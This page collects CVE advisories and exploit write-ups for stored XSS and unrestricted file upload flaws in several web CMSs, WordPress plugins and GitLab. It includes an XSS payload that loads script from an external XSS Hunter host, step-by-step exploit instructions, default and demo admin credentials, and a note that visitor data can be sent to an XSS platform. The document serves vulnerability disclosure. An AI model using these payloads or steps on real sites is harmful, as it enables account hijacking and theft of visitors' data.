A cross-site scripting (XSS) vulnerability in College Website Content Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User Profile Name text fields.

\# Exploit Title: College Website - Content Management System v1.0 - Stored(Blind) Cross Site Scripting(XSS)

\# Exploit Author: NS Kumar (n1\_x)

\# Date: March 4, 2022

\# Vendor Homepage: https://www.sourcecodester.com/php/15203/college-website-content-management-system-phpoop-free-source-code.html

\# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cwms.zip

\# Tested on: Parrot Linux, Apache, Mysql

\# Vendor: oretnom23

\# Version: v1.0

\# Exploit Description:

\# College Website - Content Management System v1.0 suffers from Stored(Blind) XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`To Exploit\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

Step 1: Goto Profile Page

Step 2: Put XSS Hunter or Any other Payload on Either First Name or Last Name field

Step 3: Wait for Admin to view your details or Just Reload the page you can see the popup shows up

Step 4: Then you will see xss fires alert on xss hunter page

Payload Used for this Exploit: "><script src=https://d4.xss.ht></script> or <script>confirm('Testing for XSS')</script>

\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`

CVE-2022-26615: OpenSource/exploit_xss_cwms at main · nsparker1337/OpenSource

Halo Blog CMS v1.4.17 was discovered to allow attackers to upload arbitrary files via the Attachment Upload function.

**是什么版本出现了此问题？**

1.4.17

**使用的什么数据库？**

MySQL 5.7

**使用的哪种方式部署？**

Fat Jar

**在线站点地址**

https://demo.halo.run/admin/index.html#/comments

**发生了什么？**

The vulnerability can lead to the upload of arbitrary malicious script files.

**相关日志输出****附加信息**

Black-box penetration：

1.  Use (demo:P@ssw0rd123...) to login in https://demo.halo.run/admin ,and then find the  
    attachment upload feature ,try to upload a random image.

![图片](https://user-images.githubusercontent.com/63443757/156746391-9308664e-4a0f-481d-a123-c7441cf32769.png)

2.  While uploading a random image, use burp suite to catch the request packet and forward it to the Repeater module.

![图片](https://user-images.githubusercontent.com/63443757/156746407-bb1dd699-9ca8-4553-958c-164af36173d9.png)

3.  You can tell we successfully uploaded the image from the screenshot below . And we can also get the path of the image accordding to the response.

![图片](https://user-images.githubusercontent.com/63443757/156746420-ebe7c2e6-0d00-491c-85e2-a1885c9c198c.png)

4.  Now we want to use the feature again. This time ,try to change the file suffix and modify the file content at the same time. After doing that , send the request again. And the upload is still successful , the file path is also returned.

![图片](https://user-images.githubusercontent.com/63443757/156746430-b8d6548e-65bd-4c9d-b27e-e6c6838004ca.png)

5.  Now try to access the file path within the url below,and our xss payload successfully executed

![图片](https://user-images.githubusercontent.com/63443757/156746443-6d9ee71d-a7a5-43e2-9d45-715e13104276.png)

6.  Screenshots of other file types uploaded are as follows：

![图片](https://user-images.githubusercontent.com/63443757/156746458-b35a4df8-6bf8-4330-9a4c-eb22aa994da5.png)

![图片](https://user-images.githubusercontent.com/63443757/156746467-86e3b944-538c-49f4-8edb-e899057ae513.png)

Source code review：  
Try to download the source code for source code security analysis  
https://github.com/halo-dev/halo/releases/tag/v1.4.17（Latest version 1.4.17）

![图片](https://user-images.githubusercontent.com/63443757/156746509-1706562c-f7bf-4afb-9622-796aec75c324.png)

7.  Check the source code and locate the class src\\main\\java\\run\\halo\\app\\controller\\admin\\api\\AttachmentController.java  
    According to the annotations of this class, you can find that all requests to the path /api/admin/attachments will access this class.

![图片](https://user-images.githubusercontent.com/63443757/156746523-473c4010-9ff8-4509-bd7f-f80988be40f4.png)

8.  The /upload path accessed by the upload interface will access the uploadAttachment method of this class.

![图片](https://user-images.githubusercontent.com/63443757/156746532-a57e34cd-1627-4bb5-bd34-5b65e0e90a71.png)

9.  As you can see, this method receives the file from the client side, then passes the file object as an argument to the upload() method of the AttachmentServiceImpl class and executes it, and then executes the result as an argument to the convertToDto() method of the AttachmentServiceImpl class.
10.  So let's follow up on the upload() method first after locating the src\\main\\java\\run\\halo\\app\\service\\impl\\AttachmentServiceImpl.java class and dive into the upload() method

![图片](https://user-images.githubusercontent.com/63443757/156746551-998eb7d5-af12-4d6d-9768-09b8b1c0f82d.png)

11.  You can see that the code does not have any file suffix checksum, and finally the upload() method will return a create(attachment) object, continue to follow up to the create() method, you can see that an Attachment class object is returned, and there is no file checksum.

![图片](https://user-images.githubusercontent.com/63443757/156746569-4053afc0-e4fa-436e-9bf3-2b394389e249.png)

12.  The returned object is entered as an argument to the convertToDto() method of the src\\main\\java\\run\\halo\\app\\service\\impl\\AttachmentServiceImpl.java class, in which you can see that the code writes the path of the uploaded file to the AttachmentDTO instance object, and it can be found that there is no logic of permission checking, and finally the method returns an AttachmentDTO instance object.

![图片](https://user-images.githubusercontent.com/63443757/156746581-00a7ff3b-9d56-4a2a-ad3a-c1edec819a9d.png)

13.  When the file path is set, this information will be brought into the response packet and eventually fed back to the client, so we can successfully access the uploaded file in the response packet based on this path information。
14.  According to the analysis of the above code, we can see that there is no logic in the code to check the file suffix, file content and file format, so it can lead to arbitrary file upload。

CVE-2022-26619: Halo Blog CMS1.4.17 Fileupload without file type authentication · Issue #1702 · halo-dev/halo

A stored cross-site scripting (XSS) vulnerability in TPCMS v3.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Phone text box.

Logging into the management system of tpcms v3.2 (admin/admin888), in the "System Settings"-"Site Configuration"-"Bottom Information"(or "Phone"), entering XSS payload and save it. Open the front-site and you can see the pop-up window caused by the XSS payload.

URL:  
http://IP/index.php/Admin/Index/index.html

Payload:

<script>alert('hello ');</script>

![Image description](https://images.gitee.com/uploads/images/2021/0702/142201_d77d842b_9371028.png "1.png")

![Image description](https://images.gitee.com/uploads/images/2021/0702/142221_8dda90de_9371028.png "2.png")

![Image description](https://images.gitee.com/uploads/images/2021/0702/142231_bc642a93_9371028.png "3.png")

![Image description](https://images.gitee.com/uploads/images/2021/0702/142239_d220979b_9371028.png "3_1.png")

This vulnerability can be used in conjunction with the XSS platform. The attacker enters the malicious payload in the corresponding text box. Whenever the visitor visits the TPCMS, the visitor's information can be sent to the XSS platform.It can be used to Phising or something else.

![Image description](https://images.gitee.com/uploads/images/2021/0702/142249_90ef59c2_9371028.png "4.png")

CVE-2022-27441: XSS storage vulnerability exists in tpcms v3.2 management system · Issue #I3YUCJ · 快乐源泉/tpcms - Gitee.com

Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager plugin <= 2.4.13 versions.

**Solution**

Update the WordPress WP Subscribe plugin to the latest available version (at least 2.4.14).

Jörgson discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Project Manager Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.4.14.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2021-36826: WordPress WP Project Manager plugin <= 2.4.13 - Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated Persistent Cross-Site Scripting (XSS) vulnerability in FV Flowplayer Video Player (WordPress plugin) versions <= 7.5.18.727 via &fv_wp_flowplayer_field_splash parameter.

**fv-wordpress-flowplayer**

**Software**

**FV Flowplayer Video Player**

**Vulnerable Versions**

**<= 7.5.18.727**

**Fixed in version**

**7.5.19.727**

**CVE**

**CVE-2022-25613**

**References**

**Credits**

**Classification**

**Cross Site Scripting (XSS)**

**OWASP Top 10**

**A7: Cross-Site Scripting (XSS)**

**Disclosure Date**

**2022-04-04**

**CVSS 3.0 score**

**Requires contributor or higher role user authentication.**

**Are your websites subject to this vulnerability?**

**Details**

**Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered by Ex.Mi (Patchstack) in WordPress FV Flowplayer Video Player plugin (versions <= 7.5.18.727).**

**Solution**

**Update the WordPress FV Flowplayer Video Player plugin to the latest available version (at least 7.5.19.727).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-25613: WordPress FV Flowplayer Video Player plugin <= 7.5.18.727 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability - Patchstack

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in wpDataTables (WordPress plugin) versions <= 2.1.27

CVE-2022-25618: wpDataTables – Tables & Table Charts

Authenticated (subscriber or higher user role if allowed to access projects) Stored Cross-Site Scripting (XSS) vulnerability in weDevs WP Project Manager (WordPress plugin) versions <= 2.4.13.

CVE-2021-36826: WP Project Manager – Project, Task Management & Team Collaboration Software

Improper neutralization of user input in GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 allowed an attacker to exploit XSS by injecting HTML in notes.

GitLab 15.0 is launching on May 22! This version brings many exciting improvements, but also removes deprecated features and introduces **breaking changes** that may impact your workflow. To see what is being deprecated and removed, please visit Breaking changes in 15.0 and Deprecations.

*   ![](https://gitlab.com/uploads/-/system/group/avatar/9970/logo-extra-whitespace.png)GitLab.org
*   cves
*   **Repository**

CVE-2022-1175: 2022/CVE-2022-1175.json · master · GitLab.org / cves · GitLab

Hello everyone! In this episode, let’s take a look at the latest vulnerabilities in Gitlab. On March 31, the Critical Security Release for GitLab Community Edition (CE) and Enterprise Edition (EE) was released. GitLab recommends that all installations running a version affected by the issues described in the bulletin are upgraded to the latest version as soon […]

Gitlab OmniAuth Static Passwords and stored XSS

The FormBuilder WordPress plugin through 1.08 does not have CSRF checks in place when creating/updating and deleting forms, and does not sanitise as well as escape its form field values. As a result, attackers could make logged in admin update and delete arbitrary forms via a CSRF attack, and put Cross-Site Scripting payloads in them.

Tag

#xss